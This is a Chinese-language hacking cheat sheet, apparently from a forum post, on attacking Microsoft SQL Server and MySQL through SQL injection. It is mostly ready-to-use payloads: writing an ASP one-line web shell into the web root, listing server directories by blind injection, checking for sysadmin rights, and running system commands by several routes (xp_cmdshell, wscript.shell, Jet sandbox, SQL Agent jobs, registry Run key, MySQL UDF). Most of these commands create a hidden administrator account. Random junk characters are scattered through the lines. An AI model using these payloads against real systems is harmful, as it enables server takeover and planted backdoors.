MSSQL语句导出一句话木马* C, M6 n$ }7 K |
首先确定网站的WEB路径
$ }" G. H* x8 w+ n4 t;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马0 g3 @+ J6 Y/ A5 Z+ p& f) ]
9 X" N8 J C5 g;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
6 f+ |7 ?1 \% J4 e" F4 u//将一句话木马插入表中
2 ]% w6 c7 {( F& D+ l- z6 ] c* R o7 J# u
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
2 N8 g2 e- b6 a( X3 ~//导出一个ASP文件
: f/ K2 |* d# q# U1 P# Y1 V
! \ g' ^# p' H) H8 {) q7 }6 [1 G. X5 ]* N
关于MSSQL列目录
% f, R) \3 o$ I" `' o w;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
' o' M3 p7 F( z6 x a5 V9 HInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表$ b: }. k% A6 p3 N" K1 A
) Z( W/ S: z2 {& q* O; wand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录% X: e/ X" D7 P# g
% ~# l7 z: [' [3 `+ m6 f; c) PAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
. l- u: I4 \; }% T9 Y- U; S" i: m8 K g) w
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符/ @. b! L0 \1 J* r' Y
0 K4 O3 z+ v7 W% i
) Y& |0 K8 g) g2 K+ G
数据库版本和权限查看' g0 w i0 J( G0 ?
and 1=(select @@VERSION) //查看详细的数据库信息.
1 R% I& P) ^+ i& }/ g& W, xand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
1 Q0 H9 {% Z0 d8 L# L6 j: w( dand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER- j8 ?6 C6 P" E* e" D+ d- I8 J
6 L% W1 ~7 n8 A
' W3 g6 k4 F0 Q1.利用xp_cmdshell执行命令
6 J" Q+ M# C1 x$ B. s) o; u/ \exec master..xp_cmdshell 'net user rfire 123456 /add'! j& h4 g- j2 k# x! J8 Z3 T
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
" s4 F' p. ~: A$ L
% ~6 ?: G# x$ ~6 e w恢复xp_cmdshell存储过程1 y8 N8 L4 s! W6 M, v. l
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
1 j/ i7 C9 @4 s& h
: H' U; V) P( w5 C! F
8 e' \3 o: f1 F2.利用SP_OAcreate和SP_OAMETHOD执行命令; w/ G2 Q! M# G O( D
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下7 m% ?* _ Q+ {) \
DECLARE @shell INT //建立一个@shell实体' g& g# f, D7 o- u% d
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
! C4 }% T8 x7 |9 tEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例& e9 Z. p2 w$ F/ C6 Y0 | q& V
7 [8 e% {/ B1 ]
5 ^3 C% l# i- [" w3.利用沙盒模式) @; ~, _' y8 Z; M9 p
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。 t- I0 d* _. M. d; m4 Z/ \
开启沙盒模式:- x* }: u) V) R+ m, m5 L
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
& W4 N2 ^6 I( ~' Y9 c, L' O0 d; [
D* S! d4 ]. T1 T! l! r执行命令:
p% u k+ L+ ?Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');) U6 y) i: ?1 z
6 [# T0 R% V e8 l2 ?' z1 P# I% ?- O2 t
4.利用SQL代理执行命令
3 H; Q1 ~0 _) A: a$ N: hEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
, M- k$ S" u' Z4 L( v5 P0 L2 y$ E5 ?& f3 u L2 ~5 s' s5 Y& I
执行命令:( Y6 G% k" z' ]
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
4 O0 M( G2 p6 E. R$ _6 Q% f, ~exec sp_add_job 'x'
! r- }) M2 G4 _0 N& Aexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业% j! Z% o9 |- u% ^, {5 ?+ f
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业* j9 q. [2 L8 A3 Y" z
4 E4 } W& I4 T- a* j
; ?3 s" o) T5 z5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)0 k( Y0 `& N, h& x" l* G
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
- {+ u0 z- l# u( F, t" R! ?6 e3 ^9 H
# ^. C1 H; f2 N+ N# {+ r/ \2 `6.MYSQL的命令执行3 H4 I. r# K. a' S7 a
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)/ h# ?$ A. O& O* ^5 U
首先要在su.php下导出c:\windows\udf.dll! ]2 I, M. H9 D0 s) x$ W4 D
导出后执行创建自定义函数命令:& @1 D' y( x' Z! \+ g
Create Function cmdshell returns string soname 'udf.dll'- E& G& c4 ?8 g0 l1 j# ?
执行命令% x8 _# M6 y/ i4 G0 e P2 @$ n4 W
select cmdshell('net user rfire 123456 /add')
* p, \- s: @9 `$ v$ t/ X& g执行后删除函数 drop function cmdshell# \: I4 d" b9 @) D# w
|